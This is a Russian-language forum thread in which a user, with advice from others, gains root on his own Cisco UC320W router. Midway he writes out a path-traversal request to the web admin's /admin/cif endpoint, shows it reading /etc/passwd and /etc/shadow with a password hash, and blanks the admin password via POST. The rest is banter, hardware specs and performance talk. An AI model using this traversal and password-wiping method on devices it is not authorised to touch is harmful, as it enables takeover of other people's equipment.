LINUX.ORG.RU

ROOT под Cisco UC320W


0

1

Приветствую всех! Имею достаточно интересную железку UC320W в виде роутера с FXS/FXO портами, с линуксом и даже астериском на борту. К сожалению, так уж сложилось, что в Cisco его приговорили к EOL даже не реализовав и половины обещанного. И политику выбрали по отношению к данной модели тоже из разряда безумия, ограничили настройку конечным пользователем только веб-мордой, основанной на Adobe Flash с XML. Настрек там с гулькин нос с рассчетом на тупых админов, с подгрузкой готовых шаблонов настроек из облака. В результате получилось странное нечто в виде железки с отличной хардварной частью и инвалидом в программной. Он у меня трудится как роутер, с полу-рабочей IP телефонией. Надо заметить, что пашет как часы под любой нагрузкой. Вот только настроек функциональной части маршрутизации там на пару вкладок админки, а в телефонной части, даже dialing plan не настроить, они их в виде пакетов региональных настроек растпространяют, где даже вшит часовой пояс. Для России пакета такого не существует и как бы не планируется. Пошарив по демону, что болтается на 80 порту, нашел кусок админки Asterisk'а, пока еще ей не занимался. Не занимался потому как обнаружил своего рода дыру послушав http трафик веб-морды. В результате имею возможность читать и писать файлы в любые директории файловой системы, получать список содержимого директорий. Также у него открыт порт с telnet, но Cisco любезно отшивает по поводу реквизитов доступа к нему, типо это для саппорта третьего левела, а конечным пользователям болт... Для нас щирых только веб-морда на флеше. У Cisco есть документец по прошивке, где перечислен весь используемый open source: http://www.cisco.com/c/dam/en/us/td/docs/voice_ip_comm/unified_communications...

Прошу помочь с идеями куда копать, чтобы на него водрузить тот же openssh, или с иными способами получения рута с консолью имея возможность только писать файлы. Сам с архитектурой *nix систем знаком очень посредственно. Я всю жизнь больше виндой занимался и сетями. Имею некоторое знакомство с терминалом Mac OS X, также очень плотное с IOS'ом Cisco. Одно дело выполнять что-то по инструкции или имея необходимую документацию, другое дело в свободном полете изобретать выход из ситуации с имеющимися исходными данными. Прошу не пинать, если будут где с виду тупые вопросы касательно *никсов.

P.S. По просьбе хейторов, погуглив немного добавил символ * перед словом nix, чтобы не задевать их высокомерие своей безграмотностью в данном вопросе. Надеюсь, это им поможет более стойко сохранять душевное спокойствие.



Последнее исправление: Emulty (всего исправлений: 7)
Ответ на: Зачем звал? от Camel

Это всё в чем вы компетентны в плане помощи касательно данного топика? Последний абзац как раз на эту тему написан, предлагаю сначала до конца читать, потом только хорошо подумав накидывать дерьмо на вентилятор.

Emulty
() автор топика
Ответ на: комментарий от Emulty

Not your personal army

Слушайте, я вас не звал, а вы меня звали. У меня есть пара идей что бы делал я сам, но нет желания их вам озвучивать, потому что вы ленивый грубиян.

Camel ★★★★★
()
Ответ на: Not your personal army от Camel

Спасибо за посильную помощь, наиприветливыйший человек.

Emulty
() автор топика

долго думал перед тем как тэг nix добавить? кто и что по нему здесь найдет? да root туда же.

венда - это гарантированное ГСМ. с каждой вендо темой на ЛОРе убеждаешься.

знаком с терминалом макосыкс блин... прикинь ты не с терминалом знаком, а с командами оболочки фрибэсэдэ или что там по дефолту из тулзов на гейоси.

я бы закрывал такие темы и отправлял ТСа в гугол. ну здесь хоть сабж знаятный...

anonymous
()

Чисто теоретически можно перезаписать passwd, задав свой пароль root (для хеширования пароля в нужный формат применить другой Linux). Если telnet проверяет пароли именно оттуда, то получится залогинится.

Если есть файл /etc/rc.local, то туда можно поместить команды, которые выполнятся при загрузке системы. Например, запуск openssh, который был предварительно загружен на ФС (важно загрузить туда статически слинкованный SSH для верной архитектуры, либо не забыть все зависимости).

KivApple ★★★★★
()
Последнее исправление: KivApple (всего исправлений: 1)
Ответ на: комментарий от anonymous

Не знаю есть ли тут модераторы, но на их месте весь подобный срач резал без раздумья, таким как вы раздавал предупреждения, потом в случае повторов безбожно банил вплоть пожизненного. На счет тегов, там фильтуются спецсимволы.

Emulty
() автор топика
Ответ на: комментарий от anonymous

Вообще не пойму, вот уже двое и такие озлобленные. Откуда столько недовольства? Вы крайне одиноки и имеете прописку на порнолабе? В детстве много обижал папа или сверстники? Не дают уже второй год? Все время ищете где слить желчь? Топайте на улицу господа. Там сейчас весна, солнышко... Тошно, возьмите бутылочку пива, посидите на лавочке, может и отпустит. Вообще я сюда не с психологическими консультациями пришел, это на другой тематический форум. Займитесь наконец собой, а не поиском козлов отпущения.

Emulty
() автор топика
Ответ на: комментарий от Emulty

Под редактированием passwd я имел ввиду редактирование файла /etc/passwd, который является базой логинов-паролей. Ещё есть /etc/shadow.

KivApple ★★★★★
()
Ответ на: комментарий от KivApple

Я пока могу только догадываться о конкретике архитектуры данных файлов, полагаю, что оно должно иметь что-то схожее с виндовым файлом sam. В любом случае вы дали уже конкретные подробности и направление, теперь знаю куда копать. Там почитаю документацию, заметки по данным нюансам, а упрусь в стену, попробую здесь правильно задать нужные вопросы. Еще раз большое спасибо!

Emulty
() автор топика
Ответ на: комментарий от Emulty

Откуда столько недовольства? Вы крайне одиноки и имеете прописку на порнолабе? В детстве много обижал папа или сверстники? Не дают уже второй год?

а у тебя так бомбит, что запах гари слышно по другую сторону монитора, и что?
Я объясню в чем дело. На этом ресурсе достаточно много граммар наци, ОСОБЕННО в части наименований и терминов. Вероятнее всего, это стало нормой из-за частых случаев «кто о котлетах а кто о мухах». Они происходят по причине неоднозначности: один собеседник выразился недостаточно точно (или неверно), а другой ЛИБО указывает на ошибку ЛИБО начинает толсто троллить. И имеет на это право. Так что постарайся не быть лентяем хотя-бы когда пишешь шапку темы, и проверять ее содержание заранее.

Теперь ближе к теме:

*никсов.

1) Следовало заменить на более точное
2) Если ты уверен, что на твоем cisco linux - зачем упоминать более широкий термин?

Я пока могу только догадываться о конкретике архитектуры данных файлов

Нет понятия архитектуры файлов. Разобраться в структуре /etc/passwd или /etc/shadow поможет либо man (коих в интернете гора) либо простое открытие и просмотр своими глазами. Да-да, там нет ничего сложного.

А вот АРХИТЕКТУРУ под которую скомпилированы бинарники в твоем девайсе стоило бы выяснить. Если это невозможно - скачай любой бинарник из /bin или /usr/bin или /usr/local/bin и выполни

$ file %BINARY%

либо залей файл на адекватный файл хостинг - пусть кто-то другой это сделает.

что-то схожее с виндовым файлом sam

откуда такая уверенность, что тут люди знают (или вообще слышали) об этом?

reprimand ★★★★★
()
Ответ на: комментарий от Emulty

Займитесь наконец собой

Уважаемый, не я вторгся в ваше пространство, а вы в моё, не я вас звал, а вы меня. И зачем? Чтобы задать мне вопросы в коих я не демонстрировал никакой заинтересованности, а потом меня же обвинить в недостаточной доброжелательности.

Чисто теоретически можно перезаписать passwd, задав свой пароль root (для хеширования пароля в нужный формат применить другой Linux). Если telnet проверяет пароли именно оттуда, то получится залогинится.

Если telnet проверяет пароли именно оттуда (и делает это стандартным способом, что было бы весьма необычно, потому что стандартно telnet'а уже нигде нет), то достаточно вообще стереть пароль root'а (абракадабра между двоеточиями в /etc/shadow). Если повезёт, то пустит root'ом без пароля.

Camel ★★★★★
()
Последнее исправление: Camel (всего исправлений: 1)

забыл сказать

Не занимался потому как обнаружил своего рода дыру послушав http трафик веб-морды. В результате имею возможность читать и писать файлы в любые директории файловой системы, получать список содержимого директорий.

что за дыра? как обнаружена? это не такая уж и бесполезная информация по этому поводу
я бы вообще выполнил

$ nmap -A -T4 cisco.host

так, для большей уверенности

reprimand ★★★★★
()

Букв много. Всё не читал. Пробуй эксплоиты.

turtle_bazon ★★★★★
()
Ответ на: комментарий от reprimand

Следовало заменить на более точное

Может следует использовать теги с применением моска головы.

чем тэг линукс поможет ТСу? кого скастует?

anonymous
()
Ответ на: комментарий от reprimand

а у тебя так бомбит, что запах гари слышно по другую сторону монитора, и что? Я объясню в чем дело. На этом ресурсе достаточно много граммар наци, ОСОБЕННО в части наименований и терминов. Вероятнее всего, это стало нормой из-за частых случаев «кто о котлетах а кто о мухах». Они происходят по причине неоднозначности: один собеседник выразился недостаточно точно (или неверно), а другой ЛИБО указывает на ошибку ЛИБО начинает толсто троллить. И имеет на это право. Так что постарайся не быть лентяем хотя-бы когда пишешь шапку темы, и проверять ее содержание заранее.

Стараюсь, уровень понимания тонкостей данной тематики достаточно слаб сегодня. Было бы достаточно опыта, вопросов бы не задавал, однако.

1) Следовало заменить на более точное 2) Если ты уверен, что на твоем cisco linux - зачем упоминать более широкий термин?

Не уверен, имея многолетний опыт, стараюсь вообще не быть ни в чем на 100% уверенным. Вот у вендора в документе по оупенсёрсу упоминается LINUX Kernel 2.6.22.18, но для меня оно из-за отсутствия опыта работы с никс системами почти ничем от слова абракадабра не отличается. Поэтому не хочу позиционировать себя тем, кем не являюсь.

Нет понятия архитектуры файлов. Разобраться в структуре /etc/passwd или /etc/shadow поможет либо man (коих в интернете гора) либо простое открытие и просмотр своими глазами. Да-да, там нет ничего сложного.

ОК, на счет архитектуры я не прав, бывает. Обязательно так и сделаю, посмотрю на что похоже, с чем его едят. Сам не из ленивых.

А вот АРХИТЕКТУРУ под которую скомпилированы бинарники в твоем девайсе стоило бы выяснить. Если это невозможно - скачай любой бинарник из /bin или /usr/bin или /usr/local/bin и выполни

$ file %BINARY%

либо залей файл на адекватный файл хостинг - пусть кто-то другой это сделает.

Поставлю под VMware что-нибудь из линей, по ходу наступило время не только форточки крутить. До сегодняшнего для старался не отвлекаться от основного профиля, потому как лучше что-то одно уметь хорошо, чем плохо всё подряд. Там и архитектуру выясню. Полагаю второй вариант разобрать роутер, снять радиатор, посмотреть маркировку... но программный вариант мне куда больше нравится. Сама циска такие технические подробности хранит в тайне.

откуда такая уверенность, что тут люди знают (или вообще слышали) об этом?

Нет никакой уверенности, мне это ближе к телу, кто-то поймёт, кто-то забьёт, кто-то загуглит. Никого обидеть этим или лечить не хотел. А вообще, хочу и вас поблагодарить за посильную помощь.

Emulty
() автор топика
Ответ на: комментарий от anonymous

Убрал вообще теги, только успокойтесь, пожалуйста.

Emulty
() автор топика
Ответ на: комментарий от Emulty

Вот у вендора в документе по оупенсёрсу упоминается LINUX Kernel 2.6.22.18, но для меня оно из-за отсутствия опыта работы с никс системами почти ничем от слова абракадабра не отличается.

да тут опыт не надо, простой гуглеж/википедия, за 15 минут (максимум час) уже будешь отличать linux от unix и т.д.

До сегодняшнего для старался не отвлекаться от основного профиля, потому как лучше что-то одно уметь хорошо, чем плохо всё подряд.

с этим утверждением можно поспорить. Я вот, к примеру, силен в одной области, но в то же время хорош в остальных. На эту тему есть много исследований, и подход «ты делаешь только одно» выгоден тому, кто говорит что делать. В мире есть много вещей, которыми можно заняться без ущерба основной деятельности.

Никого обидеть этим или лечить не хотел.

не надо искать обиду :) Я просто что подумал то и сказал.

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

что за дыра? как обнаружена? это не такая уж и бесполезная информация по этому поводу я бы вообще выполнил

Послушав трафик, выяснил, что настройки веб-морда пишет через настройки запрос методом POST. Запрос выглядел так: http://192.168.10.1/admin/cif?file=$PATH/$FILE

Немного потупив в данную находку, выяснил, что методом GET могу получить таким же запросом любой файл. Обнаружил, что также поддерживается такой параметр как dir, т.е. можно добраться до корня, например, таким запросом: http://192.168.10.1/admin/cif?dir=../../

Мне успешно удалось записатать несколько файлов в разные директории NVRAM роутера и считать их через http. Потом случайно обнаружил, что роутер имеет кусок админки астериска здесь: http://host/admin/voice/

Дело было в прошлые выходные, больше пока не копался в нём.

Emulty
() автор топика
Ответ на: комментарий от Emulty

Как здесь править комменты? Вижу свои ляпы, линка на правку нет, удалять коммент и его вставлять как новый как-то не феншуйно. :|

Emulty
() автор топика

Cisco любезно отшивает по поводу реквизитов доступа к нему, типо это для саппорта третьего левела, а конечным пользователям болт...

Вся суть корпораций.

mandala ★★★★★
()
Ответ на: комментарий от Emulty

Вообще не пойму, вот уже двое и такие озлобленные. Откуда столько недовольства?

Кто-то на днях предлагал перед постом новой темы вывешивать плашку «Вам здесь не рады, уходите.» Это не плохо и не хорошо, это ЛОР.

mandala ★★★★★
()
Ответ на: комментарий от Emulty

Как здесь править комменты?

ЕМНИП, получить статус «Новый пользователь». Он меняется, когда score в твоем профиле вырастет больше 50. За проявление активности в техразделе форума раз в сутки дается 0,5 очка.

mandala ★★★★★
()
Ответ на: комментарий от mandala

Many thanks. Уже 45 набралось, скоро вопрос сам и решится. :)

Emulty
() автор топика
Ответ на: комментарий от Emulty

Получилось!

GET http://192.168.10.1/admin/cif?file=/../../etc/passwd etc/passwd admin:x:0:0:root:/:/bin/sh remote:x:100:100:remote:/tmp/remote:/bin/sh

GET http://192.168.10.1/admin/cif?file=/../../etc/shadow admin:ABxjpnVCd4LHA:0:0:99999:7:::

POST http://192.168.10.1/admin/cif?file=/../../etc/shadow admin::0:0:99999:7:::

Низкий поклон Вам! Может и сам бы допёр, но однозначно потребовалось бы сильно больше времени, потому как не знал с какой стороны подступиться. Теперь дело пошло.

Позже выясню что там с архитектурой, когда займусь допиливанием функционала. Сейчас буду разбираться с тем, что уже есть.

Emulty
() автор топика
Ответ на: комментарий от Emulty

Блин, всё никак не привыкну к местному форматированию, редактирования комментов пока еще не заслужил.

Приношу извинения за формат запроса и его выхлопа в одну строку.

Emulty
() автор топика
Ответ на: комментарий от reprimand

Меня все больше прёт с этой железки. 2гб впаянная флешка, 2usb порта, 128мб ОЗУ, ARM.

# cat /proc/cpuinfo Processor : ARM926EJ-S rev 1 (v5l)
BogoMIPS : 1187.84
Features : swp half thumb fastmult edsp
CPU implementer : 0x56
CPU architecture: 5TE
CPU variant : 0x2
CPU part : 0x131
CPU revision : 1
Cache type : write-back
Cache clean : cp15 c7 ops
Cache lockdown : format C
Cache format : Harvard
I size : 16384
I assoc : 4
I line length : 32
I sets : 128
D size : 16384
D assoc : 4
D line length : 32
D sets : 128v
Hardware : Feroceon-KW
Revision : 0000
Serial : 0000000000000000

# cat /proc/meminfo
MemTotal: 126628 kB
MemFree: 27872 kB
Buffers: 15944 kB
Cached: 40140 kB
SwapCached: 0 kB
Active: 43500 kB
Inactive: 27524 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 12 kB
Writeback: 0 kB
AnonPages: 14956 kB
Mapped: 8708 kB
Slab: 21100 kB
SReclaimable: 3696 kB
SUnreclaim: 17404 kB
PageTables: 708 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
CommitLimit: 63312 kB
Committed_AS: 153792 kB
VmallocTotal: 516096 kB
VmallocUsed: 1736 kB
VmallocChunk: 514284 kB

# df
Filesystem 1k-blocks Used Available Use% Mounted on
rootfs 14336 14336 0 100% /
/dev/root 14336 14336 0 100% /
tmpfs 63312 0 63312 0% /dev
/dev/mtdblock/8 512 52 460 10% /etc/ca
/dev/mtdblock/5 1024 228 796 22% /fpar
/dev/mtdblock/6 512 68 444 13% /home/lic_loc
/dev/sdb1 1951520 382080 1569440 20% /home/usb_disk
/dev/loop0 29184 29184 0 100% /www/wizard

Emulty
() автор топика
Ответ на: комментарий от mandala

Как здесь править комменты?

ЕМНИП, получить статус «Новый пользователь». Он меняется, когда score в твоем профиле вырастет больше 50

Вроде и звезда есть, и зарегистрирован не так давно, а не знает, что для редактирования комментариев надо на звезду нафлудить... Память тебе таки изменяет, да.

Valkeru ★★★★
()
Последнее исправление: Valkeru (всего исправлений: 1)
Ответ на: комментарий от expelled

Да, я перепутал, поэтому потом дописал про /etc/shadow.

KivApple ★★★★★
()
Ответ на: комментарий от Deleted

У меня пчелиный провайдер, что раздаёт подключения к внешнему миру по l2tp. Провайдер обещает давать до 100мбит(на самом деле до 92 по l2tp). В реальности тот же торрент не получает больше 40-45мбит, когда находится за роутером. Пока не было доступа через консоль, посмотреть нагрузку на роутер было негде, были только догадки. Теперь проверил. Процесс, что обслуживает соединение по l2tp при качающем торренте жрет 75% ресурса. Больше ему явно не дают, зато остальные сервисы при этом не страдают, как обычно это случается на дешевых железках типа зукселя. Выход с производительностью самый простой в виде смены провайдера с прямым соединением мне понятен, но возникла мысль, можно ли найти полностью совместимый камень, но более производительный, и перепаять его?

P.S. Сложности общения с паяльной станцией и прочее здесь затрагивать не хочу, больше интересует принцип поиска полностью совместимого чипа на базе ARM.

Emulty
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.